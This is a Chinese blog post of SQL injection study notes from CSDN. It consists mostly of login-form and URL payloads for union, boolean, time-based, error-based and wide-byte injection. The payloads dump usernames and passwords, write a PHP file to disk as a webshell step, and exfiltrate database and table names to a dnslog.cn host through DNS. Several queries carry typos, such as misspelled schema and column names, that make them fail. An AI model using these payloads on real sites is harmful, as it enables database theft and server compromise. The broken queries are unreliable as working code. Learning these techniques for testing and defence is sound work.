SQL注入学习笔记

已于 2022-03-29 15:23:19 修改
阅读量4k 收藏
点赞数
分类专栏: sql注入 文章标签: web安全 sql
于 2022-03-26 21:37:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Likhaooo/article/details/123712235
版权

文章目录

sql注入分类

1.布尔注入
2.联合注入
3.延时注入
4.报错注入

联合查询

1.order by

select * from admin where user = 'admin' order by n//查看有几个字段数

2.union select联合查询

select * from admin where user = 'admin' union select version(),user(),database()
/*n是几,里面就有几个值,这儿n是3
user()查看当前用户
version()数据库版本
database() 查看当前数据库名*/

3.获取表:

select * from admin where user = 'admin' union select 1,2,table_name from information_scheam.tables where table_schenma=admin
//假设数据库名为admin

4.获取字段

select * from admin where user = 'admin' union select 1,2,colunm_name from information_schema.columns where table_name=user
### 5.获取字段内容

```sql
select * from admin where user = 'admin' union select 1,2,group_concat(username,password) from admin.user
//username,password是上面获取的字段
//hroup_concat()可以组合查询字段

导出数据库,获取webshell

select * from admin where user = 'admin' and 1=2 union select 1,2,'<?php phpinfo();?>' into outfile 'd:/1.php'

读文件

select * from admin where user = 'admin' and 1=2 union select 1,2,'load_file("d:/1.php")

布尔注入

1.获取数据库长度

username = 1' or length(database())>1 # &password = 111 
//从大于1开始试,大于2,大于3,如果大于n出错,则数据库名字符长度等于n-1

2.获取数据库名字

mid(database(),1,1)意思是获取数据库名的从第一个计数的第一个字母
ORD()转换为ascii码

username = 1' or ORD(mid(database(),1,1))>1 # &password = 111 
//用ASCII码慢慢试出来
username = 1' or ORD(mid(database(),2,1))>1 # &password = 111 
//接着获取第2个
//假设数据库名字为admin

3.获取表的总数

username = 1' or (select count(table_name) from infomation_schema.tables where table_schema=database()) = 1# &password = 111 
//慢慢试出表的总数

4.获取表长度

limit 0,1意思是从第一个开始截取第一个表
limit 1,1从第二个开始截取一个表

username = 1' or (select length(table_name) from infomation_schema.tables where table_schema=database() limit 0,1) = 1# &password = 111 
//慢慢试出表名长度

5.获取表名字

username = 1' or ORD(mid((select table_name from infomation_schema.tables where table_schema=admin limit 0,1) ,1,1))>1 # &password = 111 
//用ASCII码慢慢试出来
username = 1' or ORD(mid((select table_name from infomation_schema.tables where table_schema=admin limit 0,1) ,2,1))>1 # &password = 111 
//接着获取第2个
//假设表名字为user

6.获取字段总数

username = 1' or (select count(column_name) from infomation_schema.columns where table_name=user) = 1# &password = 111 
//慢慢试出字段总数

7.获取字段长度

username = 1' or (select length(column_name) from infomation_schema.columns where table_name=user limit 0,1) = 1# &password = 111 
//慢慢试出字段长度,接着获取第二个字段长度
username = 1' or (select length(column_name) from infomation_schema.columns where table_name=user limit 1,1) = 1# &password = 111 
//直到全部破解出来

8.获取字段名字

username = 1' or ORD(mid((select column_name from infomation_schema.columns where table_name=user limit 0,1) ,1,1))>1 # &password = 111 
//用ASCII码慢慢试出来
username = 1' or ORD(mid((select column_name from infomation_schema.columns where table_name=user limit 0,1) ,2,1))>1 # &password = 111 
//接着获取第一个字段的第二个字母,以此类推
username = 1' or ORD(mid((select column_name from infomation_schema.columns where table_name=user limit 1,1) ,1,1))>1 # &password = 111 
//接着获取第二个字段的第一个字母
//假设有两个字段分别为username,password

9.获取有多少个username和password

username = 1' or (select count(username) from 
admin.user) = 1# &password = 111 
username = 1' or (select count(password) from 
admin.user) = 1# &password = 111 
//慢慢试出总数

10.获取每个username和每个password的长度

username = 1' or (select length(username) from admin.user limit 0,1) = 1# &password = 111 
//慢慢试出第一个username长度,接着获取第二个
username = 1' or (select length(username) from admin.user limit 1,1) = 1# &password = 111 
//直到全部破解出来
username = 1' or (select length(password) from admin.user limit 0,1) = 1# &password = 111 
//以此类推,破解出password

11.获取username和password所有内容

username = 1' or ORD(mid((select username from admin.user limit 0,1) ,1,1))>1 # &password = 111 
//用ASCII码慢慢试出来
username = 1' or ORD(mid((select username from admin.user limit 0,1) ,2,1))>1 # &password = 111 
//接着获取第一个username的第二个字母,以此类推
username = 1' or ORD(mid((select username from admin.user limit 1,1) ,1,1))>1 # &password = 111 
//接着获取第二个username的第一个字母
username = 1' or ORD(mid((select password from admin.user limit 0,1) ,1,1))>1 # &password = 111 
//接着获取password内容

延时注入

sleep(5)代表网页延迟5秒执行
if(1=1,1,0)如果1=1 ,那么执行1
if(1=2,1,0)1不等于2,所以执行0

1.获取数据库长度

username = 1' or sleep(if(length(database())>1,5,0))# &password = 111 
//从大于1开始试,大于2,大于3,如果大于n出错,则数据库名字符长度等于n-1

2.获取数据库名字

username = 1' or sleep(if(ORD(mid(database(),1,1))>1,5,0)) # &password = 111 
//用ASCII码慢慢试出来
username = 1' or sleep(if(ORD(mid(database(),2,1))>1,5,0)) # &password = 111 
//接着获取第2个
//假设数据库名字为admin

3.获取表总数

4.获取表长度

5.获取表名

6.获取字段总数

7.获取字段长度

8.获取字段名字

9.获取各个字段内容

以上几个步骤和布尔注入类型相同,只需要在前面加入sleep()函数和if()函数

BUG注入

当表中数据达到3条以上,就可以用BUG注入
BUG注入意思是当同时使用count(),group by, rand()时,就会有错误

username = 1' or select concat(floor(rand(0)*2),"----",(select database())) as xx,count(1) group by xx # &password = 111 
//错误会显示数据库名

再接着爆破出表名

username = 1' or select concat(floor(rand(0)*2),"----",(select (table_name from information_schema.tables where table.schema=database()))) as xx,count(1) group by xx # &password = 111 
//错误会显示表名

接着按照联合注入的步骤爆破出字段名及其内容

函数报错注入

id=2 and 1=(updatexml(1,concat(0x3a,(select database())),1))

宽字节注入

当php开启魔术函数–magic_quotes_gpc函数时,单引号(’)  双引号(")  反斜线() 等字符都会加上反斜线
我们在id=1后面加上’ 会被自动转义为 /’ 所以导致我们输入的东西无法闭合,就不会当做代码执行,就无法产生SQL注入了。
我们在传递的参数后面加:%df’,可以看到产生了宽字节,引号成功逃逸,接着就可以常规注入!

利用dns进行注入

load_file()//读取文件
id=1? and (select (load_file(concat("\\\\",( select database()),"taf0gv.dnslog.cn"))))--+
//taf0gv.dnslog.cn为dnslog地址
id=1? and (select (load_file(concat("\\\\",( select table_name from information_schema.tables where table.schema=database() limit 0,1),"taf0gv.dnslog.cn"))))--+
練家子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入笔记
weixin_65176639的博客
04-07 160
SQL注入简介: Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。 四种基本SQL注入的方式 联合注入 基于错误的注入 布尔盲注 延时注入 使用
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
Libra1313的博客
03-17 5540
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
学习笔记SQL注入--基础篇
peanut5036的博客
02-16 1248
SQL注入自学笔记,适合小白,包括union注入,报错注入,与盲注
SQL注入学习笔记
星落
11-04 1088
SQL 注入就是指 web应用程序对用户输入的数据合法性没有过滤或者是判断,前端传入的参数是攻击者可以控制,并且参数带入数据库的查询,攻击者可以通过构造恶意的 sql语句来实现对数据库的任意操作;即通过把sql命令插入到Web表单提交或输入域名或页面请求的查询字符串中,最终欺骗服务器执行恶意的SQL命令
sql注入学习笔记
m0_52341820的博客
04-14 353
一、Mysql基础知识 1、注释 单行注释 # 多行注释 /* */ 单行注释 --空格 一般用-- + 内联注释 /*!5001*/ 注释掉的内容只有高版本的mysql才会执行 2、语句 语句/函数 解释/功能 示例 union 用来拼接两个select语句,每个查询必须拥有相同列数,结果等于等一个select语句中的列名,默认选取不同值,允许重复值用union all ...
sql注入笔记
03-15
SQL 注入笔记 SQL 注入是一种常见的 Web 应用程序漏洞,攻击者可以通过inject恶意 SQL 代码来访问、修改或控制数据库中的数据。本文将详细介绍 SQL 注入的基本概念、检测方法和防御策略。 什么是 SQL 注入? SQL ...
SQL注入手工笔记.txt
11-29
SQL手工注入小结笔记,大家都来学习学习
PHPSQL注入漏洞学习
01-21
SQL注入是攻击者通过输入恶意的SQL代码,欺骗数据库服务器执行非预期的操作,从而获取、修改、删除或添加数据的一种方法。在PHP环境中,由于不安全的用户输入处理,这种漏洞尤为突出。 二、PHP SQL注入的类型 1. ...
JDBC个人学习笔记
12-14
【JDBC学习笔记】 JDBC,全称Java Database Connectivity,是Java编程语言中用来规范客户端程序如何访问数据库的应用程序接口,由Sun Microsystems公司提出。它为程序员提供了标准的API,使得开发者可以使用Java...
sql注入学习笔记
XiaoXiao_RenHe的专栏
03-12 324
sql注入如何判断数字型、字符型注入点,是否可以cookie传参,判断字段数。
SQL注入基础学习笔记
部分学习记录
07-29 646
此文为自己学习SQL注入基础的笔记,由于是从某书直接复制过来的,存在格式问题,不过对于阅读应该影响不大,在此留个痕迹,便于以后复习和查阅,也希望能给刚刚开始学习的盆友们一点帮助吧。(不喜勿喷,谢谢) #GET基于报错的SQL注入 #GET基于报错的SQL注入发现 注入类型:数字、字符(单引号、双引号、双单引号、括号)、反斜杠 注入点?id=1 ##less-1 输入:’ 报错: 分析: ‘‘1’’ LIMIT 0,1’ 发现 ‘1’’ LIMIT 0,1 中多了一个单引号,推测输入内容为单引号引起来的字
SQL注入学习笔记整理
zh的博客
10-19 2567
1、sql注入的基础知识 1.11、数据库中的逻辑运算符 或 且 非 or and not 真 且 真 =真 真 且 假 =假 真 或 假 =真 and 比 or 的优先级要高 1.12、mysql相关语法 注释: # -- --空格 /* */ /*! */ 内联查询 常见函数与参数: substring(string,position) 从某个位置开始截取字符串 substr(string,start,length) 截取字符串的一部分 left(str,l
关于SQL注入
你只有踏出第一步,下一步才会跟着来,否则你将永远停留在原地。
11-07 199
今天看视频看到了sql注入这个问题,然后通过自己的实际操作也使用这个手段直接从界面操作到了自己的数据库,感觉这个技术有点强,就去网上查了查。 Sql 注入的定义是SQL是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQL。而SQL注入是将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证...
Sql注入---学习笔记
永不垂头的博客
07-26 226
学习笔记Sql注入 Sql注入 当有不可信数据作为查询语句的一部分发送解释器时。攻击者的恶意数据欺骗解释器以执行计划外的命令或访问数据。 报错 每个报错都有相应的解释 show databases; use jokedb; show tables; select * from users; select * from users where id=1; select user from users where id=1; select user from users; select
网络安全防御 -- 双机热备和带宽管理综合实验
最新发布
rrl18215821889的博客
07-16 553
12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。13,办公区上网用户限制流量不超过100M,其中销售部人员在其基础上限制流量不超过60M,且销售部一共10人,每人限制流量不超过6M。16,外网访问内网服务器,下行流量不超过40M,DMZ中的每台服务器限制对外提供的最大下行带宽不超过20M。做负载分担模式,生产区和办公区的流量走FW1,游客区和DMZ区走FW3。配置g0/0/0ip和开启服务。办公区销售部带宽策略;
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入学习过程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

練家子

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值